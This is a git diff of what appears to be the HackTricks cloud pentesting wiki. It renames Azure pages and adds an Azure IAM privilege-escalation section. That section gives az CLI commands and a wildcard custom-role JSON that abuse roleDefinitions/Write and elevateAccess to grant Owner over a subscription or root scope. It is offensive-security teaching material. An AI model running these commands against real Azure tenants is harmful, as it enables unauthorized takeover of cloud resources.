GITBOOK-717: No subject

SUMMARY.md

@@ -399,7 +399,7 @@
     * [Az - Device Code Authentication Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md)
     * [Az - Password Spraying](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md)
   * [Az - Services](pentesting-cloud/azure-security/az-services/README.md)
-    * [Az - Entra ID (formerly AzureAD - AAD) & IAM](pentesting-cloud/azure-security/az-services/az-azuread.md)
+    * [Az - Entra ID (AzureAD) & Azure IAM](pentesting-cloud/azure-security/az-services/az-azuread.md)
     * [Az - Management Groups, Subscriptions & Resource Groups](pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md)
     * [Az - ACR](pentesting-cloud/azure-security/az-services/az-acr.md)
     * [Az - Application Proxy](pentesting-cloud/azure-security/az-services/az-application-proxy.md)
@@ -442,13 +442,13 @@
     * [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md)
     * [Az - Queue Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md)
   * [Az - Privilege Escalation](pentesting-cloud/azure-security/az-privilege-escalation/README.md)
-    * [Az - Authorization Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md)
+    * [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md)
     * [Az - EntraID Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md)
       * [Az - Conditional Access Policies & MFA Bypass](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md)
       * [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md)
-    * [Az - Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md)
     * [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md)
     * [Az - Queue Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md)
+    * [Az - Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md)
   * [Az - Persistence](pentesting-cloud/azure-security/az-persistence/README.md)
     * [Az - Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md)
     * [Az - Queue Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md)

pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md

@@ -1,4 +1,4 @@
-# Az - Authorization Privesc
+# Az - Azure IAM Privesc (Authorization)
 
 {% hint style="success" %}
 Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1).png" alt="" data-size="line">\
@@ -15,9 +15,17 @@ Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2).png"
 </details>
 {% endhint %}
 
+## Azure IAM
+
+Fore more information check:
+
+{% content-ref url="../az-services/az-azuread.md" %}
+[az-azuread.md](../az-services/az-azuread.md)
+{% endcontent-ref %}
+
 ### Microsoft.Authorization/roleAssignments/write
 
-This permission allows to assign roles to principals over a specific scope:
+This permission allows to assign roles to principals over a specific scope, allowing an attacker to escalate privileges by assigning himself a more privileged role:
 
 {% code overflow="wrap" %}
 ```bash
@@ -26,6 +34,55 @@ az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e55
 ```
 {% endcode %}
 
+### Microsoft.Authorization/roleDefinitions/Write
+
+This permission allows to modify the permissions granted by a role, allowing an attacker to escalate privileges by granting more permissions to a role he has assigned.
+
+Create the file `role.json` with the following **content**:
+
+```json
+{
+  "Name": "<name of the role>",
+  "IsCustom": true,
+  "Description": "Custom role with elevated privileges",
+  "Actions": [
+    "*"
+  ],
+  "NotActions": [],
+  "DataActions": [
+    "*"
+  ],
+  "NotDataActions": [],
+  "AssignableScopes": [
+    "/subscriptions/<subscription-id>"
+  ]
+}
+```
+
+Then update the role permissions with the previous definition calling:
+
+```bash
+az role definition update --role-definition role.json
+```
+
+### Microsoft.Authorization/elevateAccess/action
+
+This permissions allows to elevate privileges and be able to assign permissions to any principal to Azure resources. It's meant to be given to Entra ID Global Administrators so they can also manage permissions over Azure resources.
+
+{% hint style="success" %}
+I think the user need to be Global Administrator in Entrad ID for the elevate call to work.
+{% endhint %}
+
+{% code overflow="wrap" %}
+```bash
+# Call elevate
+az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"
+
+# Grant a user the Owner role
+az role assignment create --assignee "<obeject-id>" --role "Owner" --scope "/"
+```
+{% endcode %}
+
 {% hint style="success" %}
 Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1).png" alt="" data-size="line">\
 Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

pentesting-cloud/azure-security/az-services/az-azuread.md

@@ -1,4 +1,4 @@
-# Az - Entra ID (formerly AzureAD - AAD) & IAM
+# Az - Entra ID (AzureAD) & Azure IAM
 
 {% hint style="success" %}
 Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1).png" alt="" data-size="line">\
@@ -930,10 +930,16 @@ Get-AzureADMSScopedRoleMembership -Id <id> | fl #Get role ID and role members
 {% endtab %}
 {% endtabs %}
 
-## Privilege Escalation
+## Entra ID Privilege Escalation
 
-{% content-ref url="../az-privilege-escalation/" %}
-[az-privilege-escalation](../az-privilege-escalation/)
+{% content-ref url="../az-privilege-escalation/az-entraid-privesc/" %}
+[az-entraid-privesc](../az-privilege-escalation/az-entraid-privesc/)
+{% endcontent-ref %}
+
+## Azure Privilege Escalation
+
+{% content-ref url="../az-privilege-escalation/az-authorization-privesc.md" %}
+[az-authorization-privesc.md](../az-privilege-escalation/az-authorization-privesc.md)
 {% endcontent-ref %}
 
 ## Defensive Mechanisms
@@ -980,7 +986,7 @@ It allows the admin to configure it to **block** attempts when the risk is "Low
 Nowadays it's recommended to add these restrictions via Conditional Access policies where it's possible to configure the same options.
 {% endhint %}
 
-## Entra Password Protection
+### Entra Password Protection
 
 Entra Password Protection ([https://portal.azure.com/#view/Microsoft\_AAD\_ConditionalAccess/PasswordProtectionBlade](https://portal.azure.com/#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade)) is a security feature that **helps prevent the abuse of weak passwords in by locking out accounts when several unsuccessful login attempts happen**.\
 It also allows to **ban a custom password list** that you need to provide.